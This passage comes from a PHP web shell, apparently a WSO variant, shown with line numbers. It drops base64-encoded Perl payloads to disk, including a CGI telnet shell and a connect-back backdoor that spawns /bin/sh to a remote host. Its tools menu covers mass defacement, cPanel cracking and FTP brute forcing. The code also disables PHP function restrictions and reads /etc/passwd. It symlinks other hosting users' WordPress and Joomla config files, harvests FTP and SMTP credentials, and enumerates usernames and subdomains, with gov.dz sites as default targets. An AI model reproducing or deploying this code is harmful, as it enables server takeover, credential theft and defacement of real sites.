QvOw0KCQkkVGFyZ2V0RmlsZSAuPSAkUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2UgaGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KDQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJhbnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQxOw0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmludCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgllbHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsNCgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlwcmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWluIFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29tbWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMgdG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZpbGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==
1476';
1477
1478$file = fopen("cgi.cin" ,"w+");
1479$write = fwrite ($file ,base64_decode($cgishellizocin));
1480fclose($file);
1481 chmod("cgi.cin",0755);
1482$netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
1483MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
1484ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
1485MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
1486ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
1487MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
1488Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
1489KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
1490SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
1491ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
1492UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
1493VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
1494ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
1495JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
1496bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
1497ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
1498YXRhY2hlZFxuXG4iOw==';
1499
1500$file = fopen("dc.pl" ,"w+");
1501$write = fwrite ($file ,base64_decode($netcatshell));
1502fclose($file);
1503 chmod("dc.pl",0755);
1504 echo "<iframe src=cgi-telnet/cgi.cin width=100% height=100% frameborder=0></iframe> ";
1505echo '</div>';
1506wsoFooter(); }
1507##################### Tools #########################
1508function actiontools() {
1509wsoHeader();
1510echo'
1511<center>
1512<a href=# onclick="g(\'mass\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Folders Mass Defacer ]</a><br><br>
1513<a href=# onclick="g(\'config\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Config Grabber ]</a><br><br>
1514<a href=# onclick="g(\'configsh\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Config Killer ]</a><br><br>
1515<a href=# onclick="g(\'zoneh\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Zone-h Poster ]</a><br><br>
1516<a href=# onclick="g(\'ftpsmtp\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ FTP And SMTP Config Grabber ]</a><br><br>
1517<a href=# onclick="g(\'Php\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ PHP Exec ]</a><br><br>
1518<a href=# onclick="g(\'userchecker\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Web Site Username Checker ]</a><br><br>
1519<a href=# onclick="g(\'cpcrack\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Cpanel Cracker ]</a><br><br>
1520<a href=# onclick="g(\'lfiscan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ LFI ]</a><br><br>
1521<a href=# onclick="g(\'BruteForce\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ FTP BrutForce ]</a><br><br>
1522<a href=# onclick="g(\'sub\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Sub Domain Checker ]</a><br><br>
1523<a href=# onclick="g(\'shellfind\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Shell Finder ]</a><br><br>
1524';
1525wsoFooter();}
1526#################### Config Killer #################
1527function actionconfigsh() {
1528wsoHeader();
1529echo'
1530<center><h1>Config Killer</h1>
1531<center><form method=post><font color=white size=2 face="comic sans ms">Creat PHP.ini To Bypass Disbale Functions</font><p>
1532<center><input type="hidden" name="a" value="configsh"><input type=submit name=ini value="PHP.ini" /></form>
1533<center><form method=post><font color=white size=2 face="comic sans ms">Extract Username To Symlink</font><p>
1534 <cente><input type="hidden" name="a" value="configsh"><input type=submit name="usre" value="Extract Usernames" /></form><br>';
1535 if(isset($_POST['ini']))
1536 {
1537
1538 $r=fopen('php.ini','w');
1539 $rr=" disbale_functions=none ";
1540 fwrite($r,$rr);
1541 $link="<br><a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>PHP.INI</u></font></a>";
1542 echo $link;
1543
1544 }
1545
1546
1547
1548 ?>
1549
1550
1551 <?php
1552 if(isset($_POST['usre'])){
1553 ?><form method=post>
1554 <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
1555foreach($users as $user)
1556{
1557$str=explode(":",$user);
1558echo $str[0]."\n";
1559}
1560
1561?></textarea><br><br>
1562 <input type="hidden" name="a" value="configsh"><input type=submit name=su value="Get Symlink !" /></form>
1563 <?php } ?>
1564 <?php
1565 error_reporting(0);
1566 echo "<font size=2 face=\"comic sans ms\">";
1567 if(isset($_POST['su']))
1568 {
1569 mkdir('phdz-root2',0777);
1570$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1571$g = fopen('phdz-root2/.htaccess','w');
1572fwrite($g,$rr);
1573$indishell = symlink("/","phdz-root2/root");
1574 $rt="<a href=phdz-root2/root><font color=white size=3 face=\"comic sans ms\"> Root</font></a>";
1575 echo " [+] Root Symlink<br><u>$rt</u>";
1576
1577 $dir=mkdir('phdz-config2',0777);
1578 $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1579 $f = fopen('phdz-config2/.htaccess','w');
1580
1581 fwrite($f,$r);
1582 $consym="<a href=phdz-config2/><font color=white size=3 face=\"comic sans ms\">Configs</font></a>";
1583 echo "<br>[+] Config Grabbed<br><u><font size=2 face=\"comic sans ms\">$consym</font></u>";
1584
1585 $usr=explode("\n",$_POST['user']);
1586 $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
1587 foreach($usr as $uss )
1588 {
1589 $us=trim($uss);
1590
1591 foreach($configuration as $c)
1592 {
1593 $rs="/home/".$us."/public_html/".$c;
1594 $r="phdz-config2/".$us." .. ".$c;
1595 symlink($rs,$r);
1596
1597 }
1598
1599 }
1600
1601
1602 }
1603wsoFooter(); }
1604#################### FTP SMTP ####################
1605function actionftpsmtp() {
1606wsoHeader();
1607?>
1608<center>
1609<h1><b>FTP And SMTP Configs Grabber</b></h1>
1610<FORM action="" method="post">
1611<input type="hidden" name="form_action" value="1">
1612<table border=1>
1613<tr><td><span>Configs Link :</span></td><td><input type="text" size="60" name="url" value="www.gov.dz/phdz-config/"></td></tr>
1614</table>
1615<br>
1616<input type="hidden" name="a" value="ftpsmtp"><INPUT class=submit type="submit" value=">>" >
1617</FORM>
1618</font>
1619</center>
1620</body>
1621</html>
1622<?
1623if (array_key_exists('form_action', $_POST)){
1624echo('<center><br><br>');
1625echo "<span>";
1626
1627echo "[] Getting Config URL : [] ".$_POST['url'];
1628$url1=file_get_contents($_POST['url']);
1629$ar = explode('<li><a href="', $url1);
1630for($vi=2;$vi < count($ar);$vi++)
1631 {
1632
1633$var1 = strtok($ar[$vi], " ");
1634$var1 = substr($var1,0,-2);
1635$link = $url1.$var1;
1636$filename = 'jftp.txt';
1637$fp = fopen($filename, "a+");
1638$write = fputs($fp, $var1."\n");
1639fclose($fp);
1640}
1641echo "<br>";
1642echo "[] Collected All Config Names []";
1643echo "<br>";
1644echo "[] Seperating Joomla Configs []";
1645echo "<br>";
1646$joomconfigs=file('jftp.txt');
1647ini_set("display_errors", "0");
1648set_time_limit(0);
1649foreach ($joomconfigs as $joomconfig) {
1650$pos = strpos($joomconfig,"oomla");
1651if($pos === false) {
1652$filename = 'others.txt';
1653$fp = fopen($filename, "a+");
1654$write = fputs($fp, $joomconfig."\n");
1655fclose($fp);
1656}
1657else {
1658$filename = 'joomla.txt';
1659$fp = fopen($filename, "a+");
1660$write = fputs($fp, $joomconfig."\n");
1661fclose($fp);
1662}
1663}
1664unlink ('jftp.txt');
1665unlink ('others.txt');
1666echo "[] Joomla Configs Seperated []";
1667echo "<br>";
1668echo "[] Scanning JOOMLA FTP Credentials []";
1669echo "<br>";
1670echo ("<center><table border=1 cellspacing=1 cellpading=1>
1671<tr><th width='400'><span>SMTP DETAILS</span></th><th width=200><span>FTP Host</span></th> <th width=150><span>FTP Username</span></td><th width=150><span>FTP Password</span></td><th width=100><span>ENABLED</span></td></tr>");
1672
1673$getconfig=file('joomla.txt');
1674foreach ($getconfig as $gconfig) {
1675$strlengconfig=strlen($gconfig);
1676if ($strlengconfig > 2) {
1677$urltoconfig=$_POST['url']."/".$gconfig;
1678$getconfig=file_get_contents($urltoconfig);
1679$ftphost=entre2v2($getconfig,"ftp_host = '","';");
1680$ftpuser=entre2v2($getconfig,"ftp_user = '","';");
1681$ftppass=entre2v2($getconfig,"ftp_pass = '","';");
1682$ftpenable=entre2v2($getconfig,"ftp_enable = '","';");
1683$smtpuser=entre2v2($getconfig,"smtpuser = '","';");
1684$smtppass=entre2v2($getconfig,"smtppass = '","';");
1685$smtphost=entre2v2($getconfig,"smtphost = '","';");
1686$smtpport=entre2v2($getconfig,"smtpport = '","';");
1687
1688if ($ftpenable==1){
1689$ftpenabled="YES";
1690echo "<center><table border=1 cellspacing=1 cellpading=1>
1691<tr><td width='400'><font color='green' face='courier new' > host=$smtphost <br> port=$smtpport <br> user=$smtpuser <br> pass=$smtppass <br> </font></td><td width=200><font color='green' face='courier new' > $ftphost </font></td><td width=150><font color='green' face='courier new'> $ftpuser<font></td><td width=150><font color='green' face='courier new'> $ftppass</font></td><td width=100><font color='green' face='courier new'> $ftpenabled </font></td></tr></table></center>";
1692}
1693else {
1694$ftpenabled="NO";
1695echo "<center><table border=1 cellspacing=1 cellpading=1>
1696<tr><td width='400'><font color='green' face='courier new' > host=$smtphost <br> port=$smtpport <br> user=$smtpuser <br> pass=$smtppass <br></font></td><td width=200><font color='green' face='courier new' > $ftphost </font></td><td width=150><font color='green' face='courier new'> $ftpuser<font></td><td width=150><font color='green' face='courier new'> $ftppass</font></td><td width=100><font color='red' face='courier new'> $ftpenabled </font></td></tr></table></center>";
1697}
1698}
1699}
1700
1701echo"</font>";
1702echo('</center>');
1703unlink ('joomla.txt');
1704}
1705function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1706 $ar0=explode($marqueurDebutLien, $text);
1707 $ar1=explode($marqueurFinLien, $ar0[$i]);
1708 return trim($ar1[0]);
1709}
1710wsoFooter(); }
1711######################### Web Site Username Checker ##########################
1712function actionuserchecker() {
1713wsoHeader();
1714echo' <center><h1>Web Site Username Checker</h1><br><br>
1715 </center>
1716 </center>
1717 <form method="post"><center>
1718 <input type="text" name="si" value="http://www.gov.dz/"><br />
1719 <input type="hidden" name="a" value="userchecker"><input type="submit" name="b0x" value=">>" ><br></form>
1720 ';
1721 $fo = $_POST['si'];
1722 $fo2 = $fo;
1723 $strlen = strlen($fo2);
1724 $fo2 = replace($fo2);
1725 for($i=0;$i<=$strlen;$i++)
1726 {
1727 $words[] = substr($fo2 ,0 ,$i);
1728 }
1729
1730 foreach($words as $users)
1731 {
1732 echo $users."<br>";
1733 if($_POST['b0x'])
1734 {
1735 cURL($fo,$users);
1736 }
1737 }
1738
1739 function cURL($fo,$users)
1740 {
1741 $curl = curl_init();
1742 curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1743 curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
1744 curl_setopt($curl,CURLOPT_URL, $fo."/cgi-sys/guestbook.cgi?user={$users}");
1745 $start = curl_exec($curl);
1746 if(!eregi("Invalid username", $start))
1747 {
1748 echo "<font face='Tahoma' size='2' color='red'><b>{$users}</b></font><br>";
1749 }
1750 return $start;
1751 }
1752
1753 function replace($fo)
1754 {
1755 $search = array('http://','https://','.','-','/','www');
1756 $str = str_replace($search , "", $fo);
1757 return $str;
1758 }
1759wsoFooetr(); }
1760####################### sub domain #######################
1761function actionsub() {
1762wsoHeader();
1763echo '<br><center><h1>Subdomain Checker</h1><center><br>';
1764echo'<html><body><center></br>
1765<form method="post">
1766<input type="text" name="site" size="20" placeholder="www.site.com">
1767<input type="hidden" name="a" value="sub"><input type="submit" value="Check it Please !">
1768</form>
1769</font>';
1770echo '<br><center><span>( Delete http:// )</span><center><br>';
1771set_time_limit(0);
1772$subs = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","lan","phpmyadmin","administrator","mape","isp","shop","rex","podcast","potraga","sensation","igre","foo","api","access","ulaz","pam","sport","pretraga","pricaonica","kuvar","raketa","wwwmobile","s1","s2","foro","s3","box","open","abc","phpbb3","phpbb2","internet","phpbb","whm","mysql","webadmin","adm","admin","admins","agent","aix","recnik","alerts","av","antivirus","app","apps","appserver","archive","as400","auto","backup","banking","bbdd","bbs","bea","beta","blog","catalog","cgi","channel","channels","chat","cisco","client","clients","club","cluster","clusters","code","commerce","community","compaq","conole","consumer","contact","contracts","corporate","ceo","cso","cust","customer","cpanel","data","bd","db2","default","demo","cms","design","desktop","dev","develop","developer","device","dial","digital","dir","directory","disc","discovery","disk","dns","dns1","dns2","dns3","docs","poslovi","prijemni","znanje","mojtim","documents","domain","domains","dominoweb","download","downloads","ecommerce","e-commerce","edi","edu","education","email","enable","engine","engineer","enterprise","slike","galerija","error","event","events","example","exchange","extern","external","extranet","fax","field","finance","firewall","forum","forums","fsp","ftp","ftp2","fw","fw1","gallery","galleries","games","gateway","gopher","guest","gw","hello","helloworld","help","helpdesk","arkiva","lajme","faqe","helponline","hp","ibm","ibmdb","ids","ILMI","film","navigator","nalog","prodavnica","zdravlje","reklamiranje","zivot","images","imap","pomoc","imap4","img","imgs","info","intern","internal","intranet","invalid","iphone","ipsec","irc","ircserver","jobs","ldap","link","linux","lists","listserver","local","localhost","log","logs","login","lotus","mail","mailboxes","mailhost","result","management","manage","manager","map","maps","marketing","device","media","member","members","messenger","mngt","mobile","monitor","multimedia","music","my","names","lojra","albania","bisedo","puka","foto","emra","njohje","vip","egea-tirana","historia","forumi","vesti","administracija","net","new1","new","perkohesisht","netdata","netstats","network","news","nms","nntp","ns","ns1","ns2","ns3","ntp","online","openview","oracle","outlook","page","pages","partner","partners","pda","personal","ph","pictures","pix","pop","pop3","portal","press","print","printer","private","project","projects","proxy","public","ra","radio","raptor","ras","read","register","remote","report","reports","root","router","lister","rwhois","sac","schedules","scotty","search","secret","secure","security","seri","serv","serv2","server","service","services","shop","shopping","site","sms","smtp","smtphost","snmp","snmpd","snort","solaris","1","2","3","4","5","6","7","8","9","0","solutions","support","source","sql","ssl","stats","store","stream","streaming","sun","support","switch","sysback","system","tech","terminal","test","testing","testing123","time","tivoli","training","transfers","uddi","update","upload","uploads","video","vpn","w1","w2","w3","wais","wap","web","webdocs","weblib","weblogic","webmail","webserver","webservices","websphere","whois","wireless","work","world","write","ws","ws1","ws2","ws3","www1","www2","www3","www4","www5","www6","www7","www8","www9","drupal","wordpress","joomla","db","database","love");
1773if($_POST){
1774$url = $_POST["site"];
1775foreach($subs as $sub){
1776if(!eregi($url, gethostbyname($sub.".".$url))){
1777echo '<font face="Baskerville Old Face" color="#df5">'.$sub.".".$url.' : </font><font color="green">'.gethostbyname($sub.".".$url).'</font></br>';
1778}else{
1779echo '<font face="Baskerville Old Face" color="#df5">'.$sub.".".$url.' : Nothing Found</font></br>';
1780}
1781}
1782}
1783wsoFooter();}
1784####################### Forums #######################
1785function actionforum() {
1786wsoHeader();
1787echo'
1788<center>
1789<h1>Wordpress</h1>
1790<a href=# onclick="g(\'wpsym\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ WordPress Login Changer From Config ]</a><br><br>
1791<a href=# onclick="g(\'wpkey\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ WordPress Login Changer From Keyboard ]</a><br><br>
1792<center>
1793<h1>Joomla</h1>
1794<a href=# onclick="g(\'jmsym\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Joomla Login Changer From Config ]</a><br><br>
1795<a href=# onclick="g(\'jmkey\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Joomla Login Changer From Keyboard ]</a><br><br>
1796<center>
1797<h1>Vbulletin</h1>
1798<a href=# onclick="g(\'vbindex\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Vbulletin index changer ]</a><br><br>
1799<center>
1800<h1>PHPBB</h1>
1801<a href=# onclick="g(\'phpbb\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ PHPBB index changer ]</a><br><br>
1802<center>
1803<h1>IPB</h1>
1804<a href=# onclick="g(\'ipb\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ IPB index changer ]</a><br><br>
1805<center>
1806';
1807wsoFooter(); }
1808######################### IPB #######################
1809function actionipb() {
1810wsoHeader();
1811echo'<center><h1> IPB index Changer </h1>
1812<form method = "POST">
1813<table border = "1" width="443" height="316" style="text-align: center" align="center">
1814<tr>
1815<td height="105" width="780">
1816<p align="center"><b>Host : </b>
1817<input type="text" name="f10" size="20" value="localhost"> <b>
1818DataBase :</b> <input type ="text" name = "f11" size="20"></p>
1819<p align="center"> <b>User :</b>
1820<input type ="text" name = "f12" size="20">
1821<b> Password :</b> <input type ="text" name = "f13" size="20"><p align="center">
1822<b>Table Prefix:</b><br>
1823<input type ="text" name = "f14" size="20" value="ibf_skin_sets"></td>
1824</tr>
1825<tr>
